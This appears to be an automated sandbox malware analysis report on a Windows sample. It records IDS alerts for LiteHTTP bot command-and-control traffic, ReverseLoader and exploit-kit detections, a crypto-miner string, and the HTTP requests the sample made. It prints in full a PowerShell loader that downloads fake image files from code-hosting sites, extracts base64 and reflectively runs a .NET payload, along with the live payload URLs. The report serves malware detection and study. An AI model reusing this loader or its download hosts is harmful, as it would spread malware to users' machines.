                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex;
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T23:20:11.280992+010020204241Exploit Kit Activity Detected52.216.138.83443192.168.2.449733TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T23:20:11.369607+010020576351A Network Trojan was detected52.216.138.83443192.168.2.449733TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T23:20:04.451417+010020490381A Network Trojan was detected185.199.111.133443192.168.2.449731TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T23:21:08.789318+010028299091Malware Command and Control Activity Detected192.168.2.44982287.120.126.580TCP
                  2025-01-03T23:21:15.086194+010028299091Malware Command and Control Activity Detected192.168.2.44986387.120.126.580TCP
                  2025-01-03T23:21:23.476844+010028299091Malware Command and Control Activity Detected192.168.2.44991787.120.126.580TCP
                  2025-01-03T23:21:37.804969+010028299091Malware Command and Control Activity Detected192.168.2.45001087.120.126.580TCP
                  2025-01-03T23:21:55.133087+010028299091Malware Command and Control Activity Detected192.168.2.45001187.120.126.580TCP
                  2025-01-03T23:22:16.554980+010028299091Malware Command and Control Activity Detected192.168.2.45001287.120.126.580TCP
                  2025-01-03T23:22:27.023736+010028299091Malware Command and Control Activity Detected192.168.2.45001387.120.126.580TCP
                  2025-01-03T23:22:43.758128+010028299091Malware Command and Control Activity Detected192.168.2.45001487.120.126.580TCP
                  2025-01-03T23:22:57.633142+010028299091Malware Command and Control Activity Detected192.168.2.45001587.120.126.580TCP
                  2025-01-03T23:23:09.695642+010028299091Malware Command and Control Activity Detected192.168.2.45001687.120.126.580TCP
                  2025-01-03T23:23:26.680282+010028299091Malware Command and Control Activity Detected192.168.2.45001787.120.126.580TCP
                  2025-01-03T23:23:34.296551+010028299091Malware Command and Control Activity Detected192.168.2.45001887.120.126.580TCP
                  2025-01-03T23:23:50.789457+010028299091Malware Command and Control Activity Detected192.168.2.45001987.120.126.580TCP
                  2025-01-03T23:24:01.508185+010028299091Malware Command and Control Activity Detected192.168.2.45002087.120.126.580TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T23:21:08.789318+010028197051Malware Command and Control Activity Detected192.168.2.44982287.120.126.580TCP
                  2025-01-03T23:21:15.086194+010028197051Malware Command and Control Activity Detected192.168.2.44986387.120.126.580TCP
                  2025-01-03T23:21:23.476844+010028197051Malware Command and Control Activity Detected192.168.2.44991787.120.126.580TCP
                  2025-01-03T23:21:37.804969+010028197051Malware Command and Control Activity Detected192.168.2.45001087.120.126.580TCP
                  2025-01-03T23:21:55.133087+010028197051Malware Command and Control Activity Detected192.168.2.45001187.120.126.580TCP
                  2025-01-03T23:22:16.554980+010028197051Malware Command and Control Activity Detected192.168.2.45001287.120.126.580TCP
                  2025-01-03T23:22:27.023736+010028197051Malware Command and Control Activity Detected192.168.2.45001387.120.126.580TCP
                  2025-01-03T23:22:43.758128+010028197051Malware Command and Control Activity Detected192.168.2.45001487.120.126.580TCP
                  2025-01-03T23:22:57.633142+010028197051Malware Command and Control Activity Detected192.168.2.45001587.120.126.580TCP
                  2025-01-03T23:23:09.695642+010028197051Malware Command and Control Activity Detected192.168.2.45001687.120.126.580TCP
                  2025-01-03T23:23:26.680282+010028197051Malware Command and Control Activity Detected192.168.2.45001787.120.126.580TCP
                  2025-01-03T23:23:34.296551+010028197051Malware Command and Control Activity Detected192.168.2.45001887.120.126.580TCP
                  2025-01-03T23:23:50.789457+010028197051Malware Command and Control Activity Detected192.168.2.45001987.120.126.580TCP
                  2025-01-03T23:24:01.508185+010028197051Malware Command and Control Activity Detected192.168.2.45002087.120.126.580TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T23:21:08.521208+010028302381A Network Trojan was detected192.168.2.44982287.120.126.580TCP
                  2025-01-03T23:21:14.789394+010028302381A Network Trojan was detected192.168.2.44986387.120.126.580TCP
                  2025-01-03T23:21:22.857340+010028302381A Network Trojan was detected192.168.2.44991787.120.126.580TCP
                  2025-01-03T23:21:37.523775+010028302381A Network Trojan was detected192.168.2.45001087.120.126.580TCP
                  2025-01-03T23:21:54.821210+010028302381A Network Trojan was detected192.168.2.45001187.120.126.580TCP
                  2025-01-03T23:22:16.258180+010028302381A Network Trojan was detected192.168.2.45001287.120.126.580TCP
                  2025-01-03T23:22:26.728207+010028302381A Network Trojan was detected192.168.2.45001387.120.126.580TCP
                  2025-01-03T23:22:43.461318+010028302381A Network Trojan was detected192.168.2.45001487.120.126.580TCP
                  2025-01-03T23:22:57.336338+010028302381A Network Trojan was detected192.168.2.45001587.120.126.580TCP
                  2025-01-03T23:23:09.398835+010028302381A Network Trojan was detected192.168.2.45001687.120.126.580TCP
                  2025-01-03T23:23:26.273932+010028302381A Network Trojan was detected192.168.2.45001787.120.126.580TCP
                  2025-01-03T23:23:33.889067+010028302381A Network Trojan was detected192.168.2.45001887.120.126.580TCP
                  2025-01-03T23:23:49.932036+010028302381A Network Trojan was detected192.168.2.45001987.120.126.580TCP
                  2025-01-03T23:24:01.164523+010028302381A Network Trojan was detected192.168.2.45002087.120.126.580TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-03T23:20:11.369607+010028582951A Network Trojan was detected52.216.138.83443192.168.2.449733TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F730EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF761F730EC

                  Bitcoin Miner

                  barindex
                  Source: powershell.exe, 00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: CryptoNight
                  Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 52.216.138.83:443 -> 192.168.2.4:49733 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49777 version: TLS 1.2
                  Source: 3lhrJ4X.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: wextract.pdb source: 3lhrJ4X.exe
                  Source: Binary string: wextract.pdbGCTL source: 3lhrJ4X.exe
                  Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: windows sidebar.exe.8.dr, java.exe.8.dr, msecache.exe.8.dr, windows nt.exe.8.dr, google.exe.8.dr, microsoft onedrive.exe.8.dr, microsoft.net.exe.8.dr, microsoft office.exe.8.dr, internet explorer.exe.8.dr, windows portable devices.exe.8.dr, windowspowershell.exe.8.dr, jdownloader.exe.8.dr, microsoft.exe.8.dr, autoit3.exe.8.dr, msbuild.exe.8.dr, windows mail.exe.8.dr, windows defender.exe.8.dr, common files.exe.8.dr, windows media player.exe.8.dr, windows multimedia platform.exe.8.dr, reference assemblies.exe.8.dr, mozilla maintenance service.exe.8.dr, ifwthxgyzzxlnqytikopviejxuuiqxxdjtxycgnjituknbjfd.exe.8.dr, windows photo viewer.exe.8.dr
                  Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 00000006.00000002.1823051072.000001D3B4030000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdbG_a_ S__CorExeMainmscoree.dll source: powershell.exe, 00000006.00000002.1823051072.000001D3B4030000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1823716932.000001D3BB37F000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Badus\OneDrive\Desktop\Bot1.0.6\Bot\LiteHTTP\obj\x86\Debug\Anubis.pdb source: powershell.exe, 00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeCode function: 0_2_00007FF761F7204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF761F7204C
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData
                  Source: C:\Windows\System32\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:49822 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:49863 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:49863 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:49863 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:49822 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:49822 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:49917 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:49917 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:49917 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50010 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50016 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50011 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50012 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50014 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50010 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50010 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50020 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50013 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50016 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50011 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50016 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50014 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50012 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50011 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50012 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50014 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50020 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50020 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50013 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50013 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50018 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50018 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50018 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50015 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50015 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50015 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50017 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50017 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50017 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.4:50019 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.4:50019 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.4:50019 -> 87.120.126.5:80
                  Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 52.216.138.83:443 -> 192.168.2.4:49733
                  Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 52.216.138.83:443 -> 192.168.2.4:49733
                  Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 52.216.138.83:443 -> 192.168.2.4:49733
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.111.133:443 -> 192.168.2.4:49731
                  Source: global trafficHTTP traffic detected: GET /ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /fqwfwrqwe/werwfqwf/downloads/pbbcnnk.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /e3c0f433-171c-46e2-89e0-333c78666859/downloads/b6ce439c-77f0-4c70-80bf-c31644de3b36/pbbcnnk.txt?response-content-disposition=attachment%3B%20filename%3D%22pbbcnnk.txt%22&AWSAccessKeyId=ASIA6KOSE3BNMJEEV3FX&Signature=z6SeEEmtoWPAk%2Bh79ka8wMIffkg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEB8aCXVzLWVhc3QtMSJGMEQCIBNJmShv7MGKINf2cFLnqR6qyLtPe98WLo7eDI9nQcNyAiAN6HDMTik4z8uQLRDJhMts25H6pPl7Yd4U0Vq62UnK%2BSqwAgj3%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIM9t%2FCyMR70fx2FzCcKoQCXAjF45TfCV1fS6QZGBy56NaisJivwPlbDu%2Bnl98ll7DIvxurRbCCrTVLgI4LQynZnjuZvsiqnDUoNbORBgTWGJU5uYv4iLjk4tTmBS%2B9xetZkTp5LmCRubDsgSNP%2BqADqgSaNmv%2BWfVNWqMN8divArRrR9ER%2Bete9%2BlnREMX87DwhO1aMuQ50M8ywOZp97IB%2B0vVwHTEXWW%2BF36a%2FHKcAQHseZz%2FGDQCdCYq2ShfmMQnO53E2prvYX1wAG3mwY3af0Bw47PhA57rXXKLXSu85BI%2F3jGtdUtmMd%2B9xhbxbWYRivLXWOAHE0xUSTZTmFi1SXYrGVfXLQkKHBeZDxkL6NKHb%2FIw7cLhuwY6ngFG9dexa8v%2BqlSQ1OHbxL1SLgJZVR9ROphuLtPTEivNX9TCHpw0gW13lOyyGCDi5EM5C7mFfXpA8dH2%2BRyekxJMAGUn3SuYq5WACq1%2F8nc%2F%2FDn6Zi928v7gZvFhsPeVs350Qyj22FiTVdY8pY88m4kZ0dD5rvyxCXez1Ems57gb1TrTyEqpTJ34zsY86pbWJNqe8hiNm%2Ffc95ZTJYCKSA%3D%3D&Expires=1735944309 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
                  Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
                  Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                  Source: global trafficHTTP traffic detected: GET /ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612 HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /fqwfwrqwe/werwfqwf/downloads/pbbcnnk.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /e3c0f433-171c-46e2-89e0-333c78666859/downloads/b6ce439c-77f0-4c70-80bf-c31644de3b36/pbbcnnk.txt?response-content-disposition=attachment%3B%20filename%3D%22pbbcnnk.txt%22&AWSAccessKeyId=ASIA6KOSE3BNMJEEV3FX&Signature=z6SeEEmtoWPAk%2Bh79ka8wMIffkg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEB8aCXVzLWVhc3QtMSJGMEQCIBNJmShv7MGKINf2cFLnqR6qyLtPe98WLo7eDI9nQcNyAiAN6HDMTik4z8uQLRDJhMts25H6pPl7Yd4U0Vq62UnK%2BSqwAgj3%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIM9t%2FCyMR70fx2FzCcKoQCXAjF45TfCV1fS6QZGBy56NaisJivwPlbDu%2Bnl98ll7DIvxurRbCCrTVLgI4LQynZnjuZvsiqnDUoNbORBgTWGJU5uYv4iLjk4tTmBS%2B9xetZkTp5LmCRubDsgSNP%2BqADqgSaNmv%2BWfVNWqMN8divArRrR9ER%2Bete9%2BlnREMX87DwhO1aMuQ50M8ywOZp97IB%2B0vVwHTEXWW%2BF36a%2FHKcAQHseZz%2FGDQCdCYq2ShfmMQnO53E2prvYX1wAG3mwY3af0Bw47PhA57rXXKLXSu85BI%2F3jGtdUtmMd%2B9xhbxbWYRivLXWOAHE0xUSTZTmFi1SXYrGVfXLQkKHBeZDxkL6NKHb%2FIw7cLhuwY6ngFG9dexa8v%2BqlSQ1OHbxL1SLgJZVR9ROphuLtPTEivNX9TCHpw0gW13lOyyGCDi5EM5C7mFfXpA8dH2%2BRyekxJMAGUn3SuYq5WACq1%2F8nc%2F%2FDn6Zi928v7gZvFhsPeVs350Qyj22FiTVdY8pY88m4kZ0dD5rvyxCXez1Ems57gb1TrTyEqpTJ34zsY86pbWJNqe8hiNm%2Ffc95ZTJYCKSA%3D%3D&Expires=1735944309 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                  Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
